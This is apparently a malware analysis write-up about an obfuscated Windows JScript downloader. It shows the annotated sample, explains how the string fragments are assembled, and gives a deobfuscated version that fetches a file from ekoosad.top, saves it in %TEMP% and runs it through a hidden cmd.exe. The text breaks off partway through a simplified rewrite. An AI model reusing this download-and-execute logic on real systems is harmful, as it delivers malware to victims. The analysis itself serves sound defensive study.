// 2.js - obfuscated JScript downloader, exactly as posted. The author altered it so that a
// copy/paste/save/run will not work (e.g. tamru0() returns "MSX_" and the hbodrych0 definition
// is broken), so do not "repair" it, and never execute any version of it outside an isolated
// analysis VM. Every string the dropper needs (ProgIDs, method names, the URL) is assembled
// from fragments returned by the helper functions or picked out of junk-padded arrays; each
// trailing comment gives the resolved value. The real logic is the try/catch at the end.
function vella5() { // -> "me"
var ydgicisy8 = ["53070", 'me', "ajutta", "61724", "42722", "65096", "udiwidte"]
return ydgicisy8[1];
}
var vxajy7 = ["99601", 'on']; // [1] -> "on"
var azdyvurc4 = ['Op', "ugidu", "22792", "52245", "rvafwinle", "55932", "72416", "lhysa"]; // [0] -> "Op"

function ototmu8() { // -> "DB."
var wvobycsi = ["nbapy", "16529", "ebcogrisfi", "65715", "DB.", "89015"]
return wvobycsi[4];
}
function rgegqitt() { // -> "pNa"
var tbosni6 = [];
tbosni6["silu"] = 'yqmoj';
tbosni6["oseho"] = "uqpacevk";
tbosni6["owaqkuti"] = 'pNa';
return tbosni6["owaqkuti"];
}
var ylnurvagr3 = ["58658", "59038", "egarziz", "63169", "WS", "wocge"]; // [4] -> "WS"

function rufolly() { // -> "c "
var aplotycy = ["c ", "dipnizy", "15990", "opekam", "37005"]
return aplotycy[0];
}
var jtoxri3 = ["erimfyske", "len", "cvakruc"]; // [1] -> "len"

function anuruj1() { // -> "Bo"
var wexasuhg5 = [];
wexasuhg5["isekysco"] = 'kxizor';
wexasuhg5["ryqaws"] = 'Bo';
wexasuhg5["agvyjrupda"] = 'hefeb';
wexasuhg5["itlukbuv"] = 'oqsul';
wexasuhg5["ryrotb"] = "gigfeh";
return wexasuhg5["ryqaws"];
}
var yrat7 = ["face", "tixevi", "tymohvu", "99876", "XOb", "aqbolyr", "23311"]; // [4] -> "XOb"
var biltaloj = [".ex", "94585", "10725", "77481", "cvazagat"]; // [0] -> ".ex"
var wbegukas = ["yrix", "se", "56530", "flulyr", "utmanos", "62839", "ekgiqd", "ytpupn"]; // [1] -> "se"

function coppygy() { // -> "e"
var msorivass9 = [];
msorivass9["ubewqehcu"] = "qveha";
msorivass9["tbyvigif"] = 'e';
msorivass9["ijikbo"] = "bdubo";
return msorivass9["tbyvigif"];
}
function obovgenb() { // -> "Act"
var wyzeqizh = [];
wyzeqizh["yfoz"] = 'omucyzb';
wyzeqizh["ognyfho"] = "Act";
wyzeqizh["asemu"] = "tyry";
wyzeqizh["dkaxacjo"] = 'wgyrul';
return wyzeqizh["ognyfho"];
}
var ahibo3 = ["amapkomwe", 'Get', "99679", "usataco", "90433", "51823"]; // [1] -> "Get"
var ybiwecri6 = ['Na', "gilnecp", "yszewnefqo", "70146", "55553", "38322", "gajpiwe", "64331", "39422", "24809"]; // [0] -> "Na"

function ypyze3() { // -> "cia"
var vgajniktolz9 = [];
vgajniktolz9["dnysamvi"] = 'ikyhk';
vgajniktolz9["yfhotewu"] = "cia";
vgajniktolz9["coxzelneh"] = 'mdujatv';
vgajniktolz9["wrajbyhuvd"] = 'uxer';
vgajniktolz9["hideby"] = "fumqe";
return vgajniktolz9["yfhotewu"];
}
var cesegumk = ["ubpekji", "Sh", "mxuznatug", "41857"]; // [1] -> "Sh"
var axraxyfg = ["op", "ymiwqed", "69761", "76968", "ylwuw", "adihy"]; // [0] -> "op"

function arqacha8() { // -> "cr"
var anupg7 = [];
anupg7["dzecere"] = 'bpitoje';
anupg7["jewhyghem"] = "hteju";
anupg7["ipyd"] = "fodny";
anupg7["yhobukna"] = "cr";
anupg7["xihox"] = 'rurdubwe';
return anupg7["yhobukna"];
}
var pwymujohm = ["olytox", "jec", "djokaski"]; // [1] -> "jec"

function aqemwe2() { // -> "gu"
var ybxuhly = ["13920", "86384", "gu", "znazagfad", "35882", "77784", "uxzekcy", "96195"]
return ybxuhly[2];
}
var vunbej0 = ["dy", "nyjfy"]; // [0] -> "dy"
var mjykjujej = ["22377", "e /"]; // [1] -> "e /"

function gbaxhu0() { // -> "Re"
var enmihv9 = [];
enmihv9["nijakha"] = 'Re';
enmihv9["jfujmezz"] = 'nkyje';
enmihv9["yzkeruzwu"] = 'abdyxujs';
enmihv9["milipmi"] = "izaf";
return enmihv9["nijakha"];
}
function axyhyz9() { // -> "p?f"
var ylsimdep7 = ["p?f", "fmuto", "75414", "ogbutf"]
return ylsimdep7[0];
}
function xravsamy() { // -> "e"
var esici1 = ["37426", "izbywro", "21784", "aruzv", "23216", "fnexazavs", "88539", 'e', "zasonran"]
return esici1[7];
}
function umjukliqdy7() { // -> "Str"
var wybeq4 = [];
wybeq4["fcapo"] = "Str";
wybeq4["basyrg"] = "nufgekn";
wybeq4["kuxcu"] = "uwrews";
wybeq4["ylazo"] = 'ugdecikn';
return wybeq4["fcapo"];
}
function mzedjyl() { // -> "me"
var ajtotu = [];
ajtotu["ykjytv"] = 'ykgypd';
ajtotu["irfuhqa"] = 'ytwysca';
ajtotu["ybmotcatf"] = "me";
return ajtotu["ybmotcatf"];
}
var ecwyda = ["tus", "57236"]; // [0] -> "tus"
var dfinoc4 = ["ylrubew", 745, "ngelqa", "affamz", "90524", "ugom", "89122", "otsybxoc", "kmepa"]; // never referenced (padding)
var ahmul = ["73535", "85071", "Sta", "necedos", "rrylyhgo", "obzecel", "13831", "cetga", "27221"]; // [2] -> "Sta"
var untyqu9 = ["ixkibfuwi", "38570", "72336", "nt"]; // [3] -> "nt"

function_hbodrych0() { // sic: "function_" is not valid JScript - part of the deliberate breakage; hbodrych0() -> "te"
var xodyppex9 = [];
xodyppex9["qihge"] = "ekyjo";
xodyppex9["abixku"] = 'te';
xodyppex9["wgovub"] = 'hisu';
xodyppex9["egesg"] = 'wlixo';
return xodyppex9["abixku"];
}
var uwtiq8 = ["31226", 'en', "73707", "23428", "55818", "14746", "cahwoq", "30285", "89537", "12574"]; // [1] -> "en"

function yccejihk() { // -> "g.Fi"
var kozgy = [];
kozgy["woxqu"] = "g.Fi";
kozgy["hbijukkowh"] = "ahgalbox";
kozgy["xfyjevol"] = "ukura";
return kozgy["woxqu"];
}
var dxyqwab3 = ["ymtakd", "94110", "55328", "efgidmyv", "gqolqesjuvh", "gybze", 392, "ivem"]; // [6] -> 392 (used as 392 - 392 = 0)
var occuza = ["oqhixp", "87259", "ip", "ehqopq", "yvazi", "fpyxseto", "esxub", "ntener"]; // [2] -> "ip"
var ljubdu = ["os", "32094", "pituwne", "acylqi"]; // [0] -> "os"
var mipjaliwr2 = ["89905", 'eTo', "azyhhi", "17271", "fwyhifba", "upzyzv", "agytv", "68899"]; // [1] -> "eTo"

function cuqelh() { // -> "pt"
var ukqygn4 = ["79210", "39102", "61866", "26914", "efubyvo", "ubdibzo", "36720", 'pt']
return ukqygn4[7];
}
var opikomg1 = [59, "afcaxikh", "wcogyxk", "12751", "24569", "ylasyjh", "xlura", "59711"]; // [0] -> 59
var ajgepzy = ["10102", "Cl", "iduz"]; // [1] -> "Cl"
var yzkezu = ['\\\\', "hroruti", "sezgoqw", "qpefpezwi", "66299", "zraqjixjo", "aqruw", "22831"]; // [0] -> backslash path separator

function irjync6() { // -> "Spe"
var cqulwo = [];
cqulwo["konubl"] = "paqco";
cqulwo["epdep"] = "itahv";
cqulwo["ihawu"] = "anleni";
cqulwo["owjoql"] = "Spe";
return cqulwo["owjoql"];
}
function hgagremumf1() { // -> "ri"
var levbuvs1 = ["64531", "10675", "exycborv", "znignomqeqb", "ri"]
return levbuvs1[4];
}
var mryfcupb = ["igdod", "LHT", "73223", "aryktivfe", "24517", "66030", "carevz", "74591", "utago"]; // [1] -> "LHT"

function upbohykre() { // -> "oos"
var lsowpa0 = ["95983", "dvecaly", "11247", "31408", "kynubr", "oos"]
return lsowpa0[5];
}
function owugb() { // -> "me"
var fwimtudulc = [];
fwimtudulc["dibagcix"] = 'uwep';
fwimtudulc["olvisa"] = "qupabg";
fwimtudulc["piwba"] = "uvof";
fwimtudulc["zelvyvfi"] = "me";
return fwimtudulc["zelvyvfi"];
}
var qkusaza = ["avxon", "zmolpejfog", "58506", "yjvoju", "lubjembypk", 838]; // [5] -> 838 (used as 838 - 838 = 0)

function tamru0() { // -> "MSX_" as posted (the "_" is the author's deliberate breakage; presumably "MSX" in the real sample)
var uxxuj = ["67228", "ebkifir", "MSX_", "13743", "uxqubb", "99875", "47638", "usuczufi", "29202", "56914"]
return uxxuj[2];
}
function bupy() { // -> "Sc"
var xhety = [];
xhety["yffecpovqi"] = "elekip";
xhety["trylfy"] = "fgowbyj";
xhety["walehge"] = "ykubsak";
xhety["asehj"] = 'Sc';
xhety["upgenfan"] = 'oboksu';
return xhety["asehj"];
}
function wjucyfas8() { // -> "Ar"
var araxkejpo1 = [];
araxkejpo1["rriwop"] = "qcofa";
araxkejpo1["azqaxuph"] = "udjurte";
araxkejpo1["zxujsijihd"] = "Ar";
return araxkejpo1["zxujsijihd"];
}
function taca3() { // -> ".ph"
var qjoxlafn0 = [];
qjoxlafn0["qrultutda"] = "wgefsy";
qjoxlafn0["arahbitci"] = "kbyxtoc";
qjoxlafn0["jultins"] = ".ph";
return qjoxlafn0["jultins"];
}
var ilusbilj = ["13919", "82255", "40577", "14387", "69725", "ti"]; // [5] -> "ti"
var atnyvky = ["11284", "52223", "96671", "52681", "jylbynb", 'll', "xixgig", "ownevor", "wrefop"]; // [5] -> "ll"

function dowqi6() { // -> "Obje"
var mhunso6 = [];
mhunso6["ugoxana"] = "idqudco";
mhunso6["oroqtebx"] = "Obje";
mhunso6["ticob"] = 'ygygow';
mhunso6["ifroq"] = 'oqrudug';
mhunso6["ordyxwyn"] = "jomgi";
return mhunso6["oroqtebx"];
}
var ixmyme7 = ["ML2", "ocqocrewka"]; // [0] -> "ML2"

function ijjabko1() { // -> "n"
var epwifvubf = [];
epwifvubf["axibj"] = "yvmidamt";
epwifvubf["htynarm"] = 'elcybu';
epwifvubf["mxicotx"] = 'n';
return epwifvubf["mxicotx"];
}
var vsali6 = ["Scri", "13275", "huwdej", "ykygqy", "emqux", "50453", "11325", "16013"]; // [0] -> "Scri"
var ojaqo = ["isakol", ".XM", "49002", "jbeqpa", "jabegzojd", "anxuxzopr"]; // [1] -> ".XM"
var picqex = ["ive", "qani", "85879"]; // [0] -> "ive"

function txidohlegw() { // -> "Wri"
var exaba = [];
exaba["awtux"] = 'Wri';
exaba["fjapxabhajn"] = "umsoples";
exaba["lydi"] = 'imqydxanq';
exaba["alleqw"] = 'ufhoso';
return exaba["awtux"];
}
var unifhers0 = ['sp', "vkenrydg"]; // [0] -> "sp"
var fbomorc5 = ["ad.", "kkilyhx", "lolawsi"]; // [0] -> "ad."
var ewdexsy5 = ["gnilhus", "umbed", "14310", "GET", "28232", "dacinja", "ilquct"]; // [3] -> "GET"

function ytax9() { // -> "/ad"
var uwipweta = ["11709", "17211", "obrapqykh", "/ad", "ejqipavbe", "fivole"]
return uwipweta[3];
}
var exednycmu4 = ["28242", 459, "qjintoq", "73304", "97533"]; // [1] -> 459
var aflirvir1 = [275, "ersukkyl", "rbisa", "ofus", "djardyz", "zjuksukdyk", "pysme", "ugugbo"]; // [0] -> 275

function erikyhi() { // -> "Fu"
var obefufu = ["13173", "98262", "64370", "Fu"]
return obefufu[3];
}
var axpiss = ["22376", "ulfavycy", "22480", "agogjiv", "/ek", "ihyld", "32698", "32124", "95066"]; // [4] -> "/ek"
var nedidot0 = ["utuvnizu", "t", "ylywkuri"]; // [1] -> "t"

function mtesqamygl8() { // -> "el"
var dbicqa = [];
dbicqa["uwditp"] = "el";
dbicqa["omzecbac"] = "aholy";
dbicqa["jacqo"] = "adkiki";
return dbicqa["uwditp"];
}
function ossimqe8() { // -> "me"
var adryfmy = ["23328", "mhorahhoqp", "picgecpy", "urejeqp", "awuma", "me", "60017"]
return adryfmy[5];
}
function bvaqfoxic() { // -> "Sav"
var zefal0 = ["66066", "gekva", "31072", "47813", "aljumdov", "adnaniq", "linywn", 'Sav']
return zefal0[7];
}
var atuvcijby = ["41310", "ljyvkepdalx", "ltyqi", "Get", "vqizevqagh", "mtogiqyq", "urxyvso"]; // [3] -> "Get"
var anys7 = ["Fil", "otvyfduxo"]; // [0] -> "Fil"
var irqyzp4 = ["uppicj", "47802", "msagtori", "htt", "bavqe", "18723"]; // [3] -> "htt"

function usogzicy0() { // -> "si"
var bzyfiz3 = ['si', "egyl", "ylpymalh", "87544"]
return bzyfiz3[0];
}
function kbukeqqown2() { // -> "top"
var yshafy = ["livol", "79547", "13134", "35347", "72637", "top", "putquh", "85008"]
return yshafy[5];
}
function jpuqnoxg() { // -> "cmd"
var hawrewc1 = [];
hawrewc1["unkob"] = "yjyd";
hawrewc1["uwxabgugz"] = "ylnar";
hawrewc1["hcosyg"] = "igqevew";
hawrewc1["oshabode"] = 'dahlibqo';
hawrewc1["bnylryvzad"] = "cmd";
return hawrewc1["bnylryvzad"];
}
function sviniv3() { // -> "t."
var atqodkuw = ["duqydj", "51593", "30671", "t.", "dohzuwta", "55600"]
return atqodkuw[3];
}
var ocefp7 = ["88783", 'ru', "30304", "rbuxcu", "28349", "emjynn", "datap", "ileq"]; // [1] -> "ru"
var sorajib = ["wgorawa", "93111", "d", "wgajhy"]; // [2] -> "d"

function dqicdakv() { // -> "p:/"
var kqyqxipo = ["15757", "29838", "17813", "p:/", "udaps", "awuhexc", "oqvyxa"]
return kqyqxipo[3];
}
var pgecobo5 = ["76244", "rudbesuk", "s", "jgyhwohfac", "76858"]; // [2] -> "s"

function awdycfis() { // -> "ADO"
var iwom9 = ["60549", "buxywyg", "91232", "icwusly", "ADO"]
return iwom9[4];
}
function ktekpaq8() { // -> "lde"
var zfifhakkycn = [];
zfifhakkycn["ivydo"] = 'lde';
zfifhakkycn["ozoji"] = 'fzysyvq';
zfifhakkycn["exgavi"] = "iwokx";
zfifhakkycn["egxysmupy"] = 'anxehpaf';
return zfifhakkycn["ivydo"];
}
function lynatvo1() { // -> "sen"
var ansigs = [];
ansigs["gjetdyh"] = "ahipi";
ansigs["uklefq"] = 'tbidlyc';
ansigs["eltivpe"] = "wrydrirv";
ansigs["ejepmogy"] = 'sen';
return ansigs["ejepmogy"];
}
var yjarubh = ["72827", "14300", "99327", "50828", "48704", "20962", "obxuhxuqk", "min"]; // [7] -> "min"
var qothoqny0 = ["34656", "dvacdiza", "qihlehjapl", "en", "ewizi"]; // [3] -> "en"

function quxa() { // -> "on"
var qfodomsu0 = [];
qfodomsu0["fibispy"] = "okexjug";
qfodomsu0["podpy"] = "jiby";
qfodomsu0["usyrgim"] = "on";
qfodomsu0["ixdosor"] = "goligo";
qfodomsu0["uryjh"] = 'evem';
return qfodomsu0["usyrgim"];
}
var qtymu = ["68872", "77235", "e", "82287"]; // [2] -> "e"
var emavor = [WScript, "yjmitsyhn", "ohxonv", "94855"][0]; // -> the WScript object itself
var akahu7 = ["88459", "jyffakex", "16718", "54771", "78459", "duxylt", "yganiqha", "lkeniqe", "r", "61823"]; // [8] -> "r"

function upyqo() { // -> "=40"
var otenuti4 = ["=40", "etocc", "ciqi", "87310", "nynkopy"]
return otenuti4[0];
}
var tujfomda = ["64705", "28989", "lFo", "iwzato", "ytyzo", "46984", "yqaf"]; // [2] -> "lFo"
var ryjetky = ["gth", "81677", "ropyja", "46655", "70486", "43429", "92379"]; // [0] -> "gth"
var ycavwudco0 = ["16718", "dtywmakfihp", "ipmivc", "Po", "qekcenexl"]; // [3] -> "Po"

function nhepo8() { // -> "Na"
var tlyjipry6 = ["xifqygqefg", "Na", "opnonarm"]
return tlyjipry6[1];
}
var iwtan3 = ["klome", "vsirifax", "49597", "45431", "22644", "66295", "Typ", "liqkofjelb", "68450", "26508"]; // [6] -> "Typ"

function ozmivlade() { // -> "TP"
var efpuxlyri0 = [];
efpuxlyri0["eqacdek"] = "TP";
efpuxlyri0["ovumq"] = "vpyqhape";
efpuxlyri0["eqibp"] = 'lkubnujl';
return efpuxlyri0["eqacdek"];
}
function ogodi() { // -> "leSy"
var hwihte = ["jtecjin", "pudymw", "leSy", "33345", "86830", "fmerbakgo"]
return hwihte[2];
}
var vutu7 = ["kqucziznut", "65671", "47825", "48117", "93815", "romi", "stem"]; // [6] -> "stem"
var etgydy = ["fovjuqhykz", "ekcagep", "gsenquhyx", "ptin", "21763"]; // [3] -> "ptin"
var rvotok9 = [461, "93513"]; // [0] -> 461
var twopbymo5 = ["50125", "57902", "itos", "0", "odnadado", "athijpeks", "lgetko", "djomosy"]; // [3] -> "0"
var ubguhxy3 = ["midi", "ofbih", "48835", "42460", "94271", "rvuqsi", "Tem"]; // [6] -> "Tem"
var sulbulvy1 = ["nhidxu", "31367", "22982", "obburdojka", 58, "xyxcuhx", "pmincig", "79035"]; // [4] -> 58

function yvyc() { // -> "eam"
var zixnetmu8 = ["ujymrytt", "eam", "35221"]
return zixnetmu8[1];
}
var uqyte0 = [75, "44462", "ixsexlirm", "61212", "agemfu", "ogydsa", "jepvodu", "40780", "vixwo"]; // [0] -> 75
var ykible = ["cejkofa", "ekmero", "d", "pufjol"]; // [2] -> "d"
var vfebupa8 = ["enaw", "68684", "90905", "72837", "umantat", "xdaranni", "l"]; // [6] -> "l"

function ygiqxi() { // -> "ct"
var ugus = ["87874", "azhaflejv", "oxoqyme", "ct"]
return ugus[3];
}
function gdihuxtih6() { // -> "Sc"+"ri"+"pt"+"Fu"+"ll"+"Na"+"me" = "ScriptFullName"
var ulnelepo0 = [];
ulnelepo0["yrpijwanr"] = "gamlemw";
ulnelepo0["otzyrla"] = bupy() + hgagremumf1() + cuqelh() + erikyhi() + atnyvky[5] + ybiwecri6[0] + owugb();
ulnelepo0["hkotge"] = "avih";
return ulnelepo0["otzyrla"];
}
function ilabqe() { // -> "op"+"en" = "open"
var jyhi = ["ofoqzefu", "80888", "aqdikpyku", "sapuwv", "62510", axraxyfg[0] + qothoqny0[3], "94185", "14921"]
return jyhi[5];
}
function yrpyvmy9() { // -> "Op"+"en" = "Open"
var kwatsyf = [];
kwatsyf["tboramy"] = azdyvurc4[0] + uwtiq8[1];
kwatsyf["yqubqulp"] = 'xnujoka';
kwatsyf["ugodr"] = 'nigywr';
kwatsyf["epuxyxfu"] = 'enykhi';
kwatsyf["hmihrag"] = 'wybolvy';
return kwatsyf["tboramy"];
}
function opraw() { // -> "Typ"+"e" = "Type"
var fovicyhn = ["gsohemam", "90049", "icotvish", "76371", "vdyhi", "71193", "dqyrim", iwtan3[6] + qtymu[2], "72111", "12253"]
return fovicyhn[7];
}
function cubqog0() { // -> "sen"+"d" = "send"
var uqusjy6 = ["rwongu", lynatvo1() + sorajib[2], "78754", "48238", "sekcozfejc", "36381", "ernehkeha", "99241", "16852", "43905"]
return uqusjy6[1];
}
function zkyketxiz0() { // -> "Get"+"Spe"+"cia"+"lFo"+"lde"+"r" = "GetSpecialFolder"
var wekquzt6 = [ahibo3[1] + irjync6() + ypyze3() + tujfomda[2] + ktekpaq8() + akahu7[8], "68483", "20910", "ohzobibno", "16479", "wnogrydbulj", "eknocedh", "otalcodgo"]
return wekquzt6[0];
}
function aqyl() { // -> "Get"+"Tem"+"pNa"+"me" = "GetTempName"
var valsil7 = ["30681", "rgarvugke", "alyxhid", "97863", "90712", "nygucx", "35163", atuvcijby[3] + ubguhxy3[6] + rgegqitt() + vella5(), "asyqdego"]
return valsil7[7];
}
function rompyqh() { // -> "Po"+"si"+"ti"+"on" = "Position"
var choftyrort = [ycavwudco0[3] + usogzicy0() + ilusbilj[5] + vxajy7[1], "43184"]
return choftyrort[0];
}
function amalxudx3() { // -> "Sta"+"tus" = "Status"
var pnakalf0 = ["91199", "64940", "30676", "79876", "87961", "33032", "hutwezu", ahmul[2] + ecwyda[0]]
return pnakalf0[7];
}
function dfejy1() { // -> "Wri"+"te" = "Write"
var inoh = ["20984", "75849", "22996", txidohlegw() + hbodrych0()]
return inoh[3];
}
function uhqer1() { // -> "Re"+"sp"+"on"+"se"+"Bo"+"dy" = "ResponseBody"
var namafg3 = [];
namafg3["ipoj"] = "tsoswokr";
namafg3["cbasguptib"] = gbaxhu0() + unifhers0[0] + quxa() + wbegukas[1] + anuruj1() + vunbej0[0];
namafg3["pmekyzu"] = 'jmonogt';
namafg3["inif"] = 'gwaxakqu';
namafg3["atcytx"] = 'eqipcexh';
return namafg3["cbasguptib"];
}
function alevrur1() { // -> "Sav"+"eTo"+"Fil"+"e" = "SaveToFile"
var kukni = [];
kukni["rleqqafwo"] = bvaqfoxic() + mipjaliwr2[1] + anys7[0] + coppygy();
kukni["detildynk"] = "hlorhej";
kukni["ufykfe"] = 'wtufedo';
kukni["eposyllu"] = "pejxyq";
return kukni["rleqqafwo"];
}
function kwobo() { // -> "Cl"+"os"+"e" = "Close"
var egadig4 = ["57871", "utjywlu", "92419", ajgepzy[1] + ljubdu[0] + xravsamy(), "77245", "60351", "rodip", "atsorecx", "98210"]
return egadig4[3];
}
function axtexik5() { // -> "ru"+"n" = "run"
var mbumossi = ["27252", "bcande", ocefp7[1] + ijjabko1(), "23156", "pubjobze", "urqirno"]
return mbumossi[2];
}
// The dropper proper. Everything sits in one try/catch with an empty handler, so any
// failure (no network, ActiveX blocked, ...) ends the script silently.
try {
var ygjijzigz8 = emavor; // WScript
// "Arguments"."Named"."length": the ActiveXObject reference is only taken when the script was
// started WITHOUT named (/name:value) arguments. Otherwise lyvpuf4 stays undefined, the first
// `new lyvpuf4(...)` throws and the catch below swallows it - looks like a cheap analysis check.
if (!ygjijzigz8[wjucyfas8() + aqemwe2() + mzedjyl() + untyqu9[3] + pgecobo5[2]][nhepo8() + ossimqe8() + ykible[2]][jtoxri3[1] + ryjetky[0]]) {
var lyvpuf4 = eval(obovgenb() + picqex[0] + yrat7[4] + pwymujohm[1] + nedidot0[1]); // eval("ActiveXObject")
}
var udluw = tamru0() + ixmyme7[0] + ojaqo[1] + mryfcupb[1] + ozmivlade(); // "MSXML2.XMLHTTP" (assembles as "MSX_ML2.XMLHTTP" in this altered listing)
var nahybixfo5 = ygjijzigz8[gdihuxtih6()]; // WScript.ScriptFullName - read but never used
var zusedzary0 = irqyzp4[3] + dqicdakv() + axpiss[4] + upbohykre() + fbomorc5[0] + kbukeqqown2() + ytax9() + yjarubh[7] + taca3() + axyhyz9() + upyqo() + twopbymo5[3]; // "http://ekoosad.top/admin.php?f=400"
var ywfuwom1 = vsali6[0] + etgydy[3] + yccejihk() + ogodi() + vutu7[6] + dowqi6() + ygiqxi(); // "Scripting.FileSystemObject"
var hibsos = new lyvpuf4(udluw); // new ActiveXObject("MSXML2.XMLHTTP")
var ogyc6 = awdycfis() + ototmu8() + umjukliqdy7() + yvyc(); // "ADODB.Stream"
var exobvy8 = new lyvpuf4(ywfuwom1); // new ActiveXObject("Scripting.FileSystemObject")
hibsos[ilabqe()](ewdexsy5[3], zusedzary0, dxyqwab3[6] - 392); // open("GET", url, 0) - synchronous request
var ezus = new lyvpuf4(ogyc6); // new ActiveXObject("ADODB.Stream")
ezus[yrpyvmy9()](); // Open()
ezus[opraw()] = opikomg1[0] - sulbulvy1[4]; // Type = 59 - 58 = 1 (binary stream)
var ykxupuwx = ylnurvagr3[4] + arqacha8() + occuza[2] + sviniv3() + cesegumk[1] + mtesqamygl8() + vfebupa8[6]; // "WScript.Shell"
hibsos[cubqog0()](); // send() - the HTTP request goes out here
var wiroxywsy6 = exobvy8[zkyketxiz0()](rvotok9[0] - exednycmu4[1]) + yzkezu[0] + exobvy8[aqyl()](); // GetSpecialFolder(461 - 459 = 2) + "\" + GetTempName() -> %TEMP%\<random>.tmp
var catongo = jpuqnoxg() + biltaloj[0] + mjykjujej[1] + rufolly() + wiroxywsy6; // "cmd.exe /c " + that path
ezus[rompyqh()] = qkusaza[5] - 838; // Position = 0
var ygewx = new lyvpuf4(ykxupuwx); // new ActiveXObject("WScript.Shell")
if (hibsos[amalxudx3()] == aflirvir1[0] - uqyte0[0]) { // Status == 275 - 75 = 200
ezus[dfejy1()](hibsos[uhqer1()]); // Write(ResponseBody)
ezus[alevrur1()](wiroxywsy6); // SaveToFile(path)
ezus[kwobo()](); // Close()
ygewx[axtexik5()](catongo, dxyqwab3[6] - 392); // run("cmd.exe /c <path>", 0) - window style 0 = hidden
}
} catch (thumrobo) {}

2) Explanation of the obfuscation method :

The important part is in the try...catch

All the functions and vars before this part are used to hide the real functions, url, etc..

Every meaningful string (ProgIDs, method names, the URL) is assembled by concatenating fragments returned by helper functions or picked out of arrays padded with junk values, which makes it hard to see at a glance what the script does.

Look at the more important part :

try {

var ygjijzigz8 = emavor;
if (!ygjijzigz8[wjucyfas8() + aqemwe2() + mzedjyl() + untyqu9[3] + pgecobo5[2]][nhepo8() + ossimqe8() + ykible[2]][jtoxri3[1] + ryjetky[0]]) {

var lyvpuf4 = eval(obovgenb() + picqex[0] + yrat7[4] + pwymujohm[1] + nedidot0[1]);
}
var udluw = tamru0() + ixmyme7[0] + ojaqo[1] + mryfcupb[1] + ozmivlade();
var nahybixfo5 = ygjijzigz8[gdihuxtih6()];
var zusedzary0 = irqyzp4[3] + dqicdakv() + axpiss[4] + upbohykre() + fbomorc5[0] + kbukeqqown2() + ytax9() + yjarubh[7] + taca3() + axyhyz9() + upyqo() + twopbymo5[3];
var ywfuwom1 = vsali6[0] + etgydy[3] + yccejihk() + ogodi() + vutu7[6] + dowqi6() + ygiqxi();
var hibsos = new lyvpuf4(udluw);
var ogyc6 = awdycfis() + ototmu8() + umjukliqdy7() + yvyc();
var exobvy8 = new lyvpuf4(ywfuwom1);
hibsos[ilabqe()](ewdexsy5[3], zusedzary0, dxyqwab3[6] - 392);
var ezus = new lyvpuf4(ogyc6);
ezus[yrpyvmy9()]();
ezus[opraw()] = opikomg1[0] - sulbulvy1[4];
var ykxupuwx = ylnurvagr3[4] + arqacha8() + occuza[2] + sviniv3() + cesegumk[1] + mtesqamygl8() + vfebupa8[6];
hibsos[cubqog0()]();
var wiroxywsy6 = exobvy8[zkyketxiz0()](rvotok9[0] - exednycmu4[1]) + yzkezu[0] + exobvy8[aqyl()]();
var catongo = jpuqnoxg() + biltaloj[0] + mjykjujej[1] + rufolly() + wiroxywsy6;
ezus[rompyqh()] = qkusaza[5] - 838;
var ygewx = new lyvpuf4(ykxupuwx);
if (hibsos[amalxudx3()] == aflirvir1[0] - uqyte0[0]) {

ezus[dfejy1()](hibsos[uhqer1()]);
ezus[alevrur1()](wiroxywsy6);
ezus[kwobo()]();
ygewx[axtexik5()](catongo, dxyqwab3[6] - 392);
}
} catch (thumrobo) {}

Some examples :

var ygjijzigz8 = emavor;

=> var emavor = [WScript, "yjmitsyhn", "ohxonv", "94855"][0];
=> var emavor = [WScript,
"yjmitsyhn", "ohxonv", "94855"][0];
=> emavor = WScript object

In the same way, starting from the try...catch block, we replace each function call with the value it returns and each array reference with the string at that index.

wjucyfas8() + aqemwe2() + mzedjyl() + untyqu9[3] + pgecobo5[2]

"Ar" + "gu" + "me" + "nt" + "s"
=> "Arguments"

nhepo8() + ossimqe8() + ykible[2]

"Na" + "me" + "d"
=> "Named"

jtoxri3[1] + ryjetky[0]

"len" + "gth"
=> length​

A last example :

ezus[yrpyvmy9()]();

Let's find yrpyvmy9()

function yrpyvmy9() {
var kwatsyf = [];
kwatsyf["tboramy"] = azdyvurc4[0] + uwtiq8[1];
kwatsyf["yqubqulp"] = 'xnujoka';
kwatsyf["ugodr"] = 'nigywr';
kwatsyf["epuxyxfu"] = 'enykhi';
kwatsyf["hmihrag"] = 'wybolvy';

return kwatsyf["tboramy"];
}

it returns kwatsyf["tboramy"];

=> kwatsyf["tboramy"] = azdyvurc4[0] + uwtiq8[1];

=> azdyvurc4[0] + uwtiq8[1];

var azdyvurc4 = ['
Op', "ugidu", "22792", "52245", "rvafwinle", "55932", "72416", "lhysa"];

var uwtiq8 = ["31226", '
en', "73707", "23428", "55818", "14746", "cahwoq", "30285", "89537", "12574"];

=> yrpyvmy9() = "Open";

Etc,...

3) Deobfuscation :

try {
var ygjijzigz8 = WScript;
if (!WScript["Arguments"]["Named"]["length"]) {
var lyvpuf4 = eval("ActiveXObject");
=> eval turns the string into a reference to the ActiveXObject constructor. Note that lyvpuf4 only exists when the script was started without named arguments; otherwise every "new lyvpuf4(...)" below throws and the empty catch hides it.
}
var udluw = "MSXML2.XMLHTTP";
var nahybixfo5 = WScript["ScriptFullName"];
var zusedzary0 = "http ://ekoosad.top/admin.php?f=400";
var ywfuwom1 = "Scripting.FileSystemObject";
var hibsos = new ActiveXObject("MSXML2.XMLHTTP"); => http object
var ogyc6 = "ADODB.Stream";
var exobvy8 = new ActiveXObject("Scripting.FileSystemObject");
hibsos["open"]("GET", zusedzary0, 0); => synchronous GET of "http ://ekoosad.top/admin.php?f=400"
var ezus = new ActiveXObject("ADODB.Stream");
ezus["Open"]();
ezus["Type"] = 1; => binary stream
var ykxupuwx = "WScript.Shell";
hibsos["send"](); => request done !
var wiroxywsy6 = exobvy8["GetSpecialFolder"](2) + "\\" + exobvy8["GetTempName"](); => %TEMP%\<random>.tmp
var catongo = "cmd.exe /c " + wiroxywsy6;
ezus["Position"] = 0;
var ygewx = new ActiveXObject("WScript.Shell");
if (hibsos["Status"] == 200) {
ezus["Write"](hibsos["ResponseBody"]);
ezus["SaveToFile"](wiroxywsy6);
ezus["Close"]();
ygewx["run"](catongo, 0); => window style 0: hidden
}
} catch (thumrobo) {} => any error is swallowed silently

More understandable :

try {
var objWScript = WScript;

if (!WScript.Arguments.Named.length) {
var objActiveXObject = eval("ActiveXObject");
}

var url = "http ://ekoosad.top/admin.php?f=400";
var http = "MSXML2.XMLHTTP";
var shell = "WScript.Shell";
var stream = "ADODB.Stream";
var fso = "Scripting.FileSystemObject";

var script_path = WScript.ScriptFullName; => read but never used

